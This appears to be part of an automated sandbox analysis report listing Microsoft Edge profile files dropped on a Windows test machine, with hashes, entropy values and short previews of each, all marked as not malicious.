                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0OQyq2PcNwi23oH+TcwtrQMxIFUt8YCe0V+SG1Zmw+YCe0VKQRkwOcNwi23oM:fZVvLZYebCFUt886xG1/+86KI54ZYebf
                                                                                                                                                                                                                                                                                                                    MD5:2EA1089CD6280D4EAF0C66D71331BCF9
                                                                                                                                                                                                                                                                                                                    SHA1:4D94A8226CDEF2303D482B198A894BD5237CBA52
                                                                                                                                                                                                                                                                                                                    SHA-256:297F233A0AFBBB4C4C52E8BDD34E786294E9E0E6D96078CF0B77A97C8C3CBB26
                                                                                                                                                                                                                                                                                                                    SHA-512:C8D448F812AD18216D8D74AC27CED8E95516E52F3D7822F1802524591555E487E1E2E029F928DBCACA9F7A6CA5737808AD8BE4A83BBF71C5CCC6A7FA1E7A84CB
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.896 1f30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/27-04:49:12.909 1f30 Recovering log #3.2024/11/27-04:49:12.919 1f30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):330
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.155733730188499
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0OQyq2PcNwi23oH+TcwtrQMxIFUt8YCe0V+SG1Zmw+YCe0VKQRkwOcNwi23oM:fZVvLZYebCFUt886xG1/+86KI54ZYebf
                                                                                                                                                                                                                                                                                                                    MD5:2EA1089CD6280D4EAF0C66D71331BCF9
                                                                                                                                                                                                                                                                                                                    SHA1:4D94A8226CDEF2303D482B198A894BD5237CBA52
                                                                                                                                                                                                                                                                                                                    SHA-256:297F233A0AFBBB4C4C52E8BDD34E786294E9E0E6D96078CF0B77A97C8C3CBB26
                                                                                                                                                                                                                                                                                                                    SHA-512:C8D448F812AD18216D8D74AC27CED8E95516E52F3D7822F1802524591555E487E1E2E029F928DBCACA9F7A6CA5737808AD8BE4A83BBF71C5CCC6A7FA1E7A84CB
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.896 1f30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/27-04:49:12.909 1f30 Recovering log #3.2024/11/27-04:49:12.919 1f30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1443
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7786817155495602
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:3rxsDSqrW5LGpsAF4unxutLp3X2amEtG1ChqHPgM8ApQKkOAM4:3FsD52GzFwLp2FEkChaCHOp
                                                                                                                                                                                                                                                                                                                    MD5:17231EBFA2FE6AB6E8BA49257DD36479
                                                                                                                                                                                                                                                                                                                    SHA1:CACB920CEB665E17F92812345878EEA8A45EF89E
                                                                                                                                                                                                                                                                                                                    SHA-256:E7A7FE8CF727AED48E2F68EF4422DA848B5849F6CA57C68E7211C1AD9DA3DA17
                                                                                                                                                                                                                                                                                                                    SHA-512:EFF197B6C3141031E57050B20D062FB2ACB7FB28DB6DA34C7E73FFE238DF98CC05827B4079A016E02D19917A6A695526ED0408B53319291A2CAB822199E46A93
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SNSS.......T!dc...........T!dc......"T!dc...........T!dc.......T!dc.......U!dc.......U!dc....!..U!dc...............................T!dcU!dc1..,...U!dc$...bced4e7c_39fd_4016_8add_e6ce4167ea1c...T!dc.......U!dc....&G$........T!dc...T!dc.......................T!dc.......................5..0...T!dc&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}.....T!dc.......T!dc.......................U!dc...........U!dc........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........2...'...2...'.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                                    MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                                    SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                                    SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                                    SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):358
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2033925330073645
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0dU+q2PcNwi23oH+Tcwt7Uh2ghZIFUt8YCe0dHM4Zmw+YCe0dHMIVkwOcNwir:fypvLZYebIhHh2FUt88ys4/+8ysg54Z0
                                                                                                                                                                                                                                                                                                                    MD5:07AA5C8ECCE4E0786DCCDB9AC2D3050C
                                                                                                                                                                                                                                                                                                                    SHA1:F9B08C094F7D428DD4D913803846C2285A787367
                                                                                                                                                                                                                                                                                                                    SHA-256:D3F8FAAD190394D3847264A910969E37D077DB6333AB39A81E7A9F78BE0F7918
                                                                                                                                                                                                                                                                                                                    SHA-512:983002390B616465CF71F67F829798DE3F67A6F281ABCF54CA54A0ADB5D91A1AC1384FC8B748F2768F186F0204FC986B126ECA6593F494C9DD51EC41FF7AF630
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.156 1f98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/27-04:49:12.157 1f98 Recovering log #3.2024/11/27-04:49:12.157 1f98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):358
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2033925330073645
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0dU+q2PcNwi23oH+Tcwt7Uh2ghZIFUt8YCe0dHM4Zmw+YCe0dHMIVkwOcNwir:fypvLZYebIhHh2FUt88ys4/+8ysg54Z0
                                                                                                                                                                                                                                                                                                                    MD5:07AA5C8ECCE4E0786DCCDB9AC2D3050C
                                                                                                                                                                                                                                                                                                                    SHA1:F9B08C094F7D428DD4D913803846C2285A787367
                                                                                                                                                                                                                                                                                                                    SHA-256:D3F8FAAD190394D3847264A910969E37D077DB6333AB39A81E7A9F78BE0F7918
                                                                                                                                                                                                                                                                                                                    SHA-512:983002390B616465CF71F67F829798DE3F67A6F281ABCF54CA54A0ADB5D91A1AC1384FC8B748F2768F186F0204FC986B126ECA6593F494C9DD51EC41FF7AF630
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.156 1f98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/27-04:49:12.157 1f98 Recovering log #3.2024/11/27-04:49:12.157 1f98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0018090556708630736
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zEZl:/M/xT02z
                                                                                                                                                                                                                                                                                                                    MD5:6E2EFFFF0A63F2F7A23AA343673B9FD8
                                                                                                                                                                                                                                                                                                                    SHA1:C7E358484E5BF090678FAA6B3603377229E03EB9
                                                                                                                                                                                                                                                                                                                    SHA-256:D91A7BF7995538D63D0FB1D7C81BA4E37256E319D9C492A8CF57B78FBD9C5047
                                                                                                                                                                                                                                                                                                                    SHA-512:E5E6381C9811BAD71F7CC99057DF3F60924ECCA02ED0FFB409AE717C4025A2E8D6CA84203763EC189A3A6AAD64B0E087A291CF6DB0E7423E474D5C4FCA228308
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):440
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.254883032682491
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:f8OvLZYebvqBQFUt886J/+86X54ZYebvqBvJ:fRlYebvZg88696JoYebvk
                                                                                                                                                                                                                                                                                                                    MD5:0948146E9DA68E812CF354A8E620A685
                                                                                                                                                                                                                                                                                                                    SHA1:B47784C9E3DD5279C355A1E5AFFA993B32879D32
                                                                                                                                                                                                                                                                                                                    SHA-256:46895DEA030082DA62AC21A621CAF9BBF95BFBB3B42B4346E7F13A5389093146
                                                                                                                                                                                                                                                                                                                    SHA-512:8BCECC06CB99468EB1CC6D4D72C00474726D1FC1AC940F8D44EA7E26D10DF95A52D4D115AC9A808E8CBC2F8FDBEADDEFACAE1109BCDA0D8739101B94FC4E3A80
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.883 1b78 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/27-04:49:12.913 1b78 Recovering log #3.2024/11/27-04:49:12.917 1b78 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):440
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.254883032682491
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:f8OvLZYebvqBQFUt886J/+86X54ZYebvqBvJ:fRlYebvZg88696JoYebvk
                                                                                                                                                                                                                                                                                                                    MD5:0948146E9DA68E812CF354A8E620A685
                                                                                                                                                                                                                                                                                                                    SHA1:B47784C9E3DD5279C355A1E5AFFA993B32879D32
                                                                                                                                                                                                                                                                                                                    SHA-256:46895DEA030082DA62AC21A621CAF9BBF95BFBB3B42B4346E7F13A5389093146
                                                                                                                                                                                                                                                                                                                    SHA-512:8BCECC06CB99468EB1CC6D4D72C00474726D1FC1AC940F8D44EA7E26D10DF95A52D4D115AC9A808E8CBC2F8FDBEADDEFACAE1109BCDA0D8739101B94FC4E3A80
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.883 1b78 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/27-04:49:12.913 1b78 Recovering log #3.2024/11/27-04:49:12.917 1b78 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):111
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                                    MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                                    SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                                    SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                                    SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):111
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                                    MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                                    SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                                    SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                                    SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                                    MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                                    SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                                    SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                                    SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):80
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                                    MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                                    SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                                    SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
